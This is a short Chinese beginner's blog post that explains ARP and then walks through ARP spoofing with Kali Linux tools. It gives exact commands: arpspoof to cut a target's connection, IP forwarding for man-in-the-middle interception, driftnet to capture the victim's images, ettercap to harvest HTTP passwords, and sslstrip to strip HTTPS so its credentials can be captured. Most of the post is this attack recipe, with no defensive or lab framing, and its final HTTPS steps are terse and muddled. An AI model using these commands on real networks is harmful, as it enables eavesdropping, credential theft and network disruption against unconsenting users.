新人入门写点东西记录自己的成长，希望能坚持下去，如果有错误还请大佬不吝赐教

ARP协议

ARP（Address Resolution Protocol，地址解析协议）是一个位于TCP/IP协议栈中的网络层，负责将某个IP地址解析成对应的MAC地址。

基本功能

通过目标设备的IP地址，查询目标设备的MAC地址，以保证通信的进行。

ARP攻击的局限性

ARP攻击仅能在以太网（局域网如：机房、内网、公司网络等）进行。
无法对外网（互联网、非本区域内的局域网）进行攻击。

ARP攻击的攻击原理

ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗，能够在网络中产生大量的ARP通信量使网络阻塞，攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目，造成网络中断或中间人攻击。

一准备工作

环境：kali-linux
工具：arpspoof
相关协议：
http：https://baike.baidu.com/item/http/243074?fr=aladdin
https：https://baike.baidu.com/item/https

1：获取自己的网卡，IP，网关信息。

使用代码：ifconfig route -n

2：获取目标ip与网关信息。

a:在目标主机（一般是windows环境） ipconfig
b：扫描局域网内主机
使用代码：
使用代码:fping -asg 自己的ip

192.168.1.6是自己
192.168.1.1是网关

准备完成后，开始真皮沙发

1，arp断网攻击

代码： arpspoof -i eth0(网卡) -t 192.168.1.5（目标ip） 192.168.1.1（自己的网关）

攻击完成，此时被攻击电脑无法上完。图略

2 ，arp欺骗

首先要开始IP转发功能，linux因为系统安全考虑，是不支持IP转发的，其配置文件写在/proc/sys/net/ipv4的ip_forward中。默认为0，接下来修改为1。
代码：echo 1 >/proc/sys/net/ipv4/ip_forward
修改完成后不显示，但可以用 cat /proc/sys/net/ipv4/ip_forward来确实是否修改成功

3，抓取使用http协议的网页的图片

完成1，2后使用 driftnet -i eth0
弹出的对话框别关！！

成功
图片同时保存在主文件夹下

4，http账户密码获取

完成1，2，使用代码：ettercap -Tp -i eth0

如果遇到乱码，可能是中文，需百度URL解码

5，https账户密码获取

完成1
使用代码：sslstrip -a -f -k sslstrip->使https链接还原为http
完成2
完成3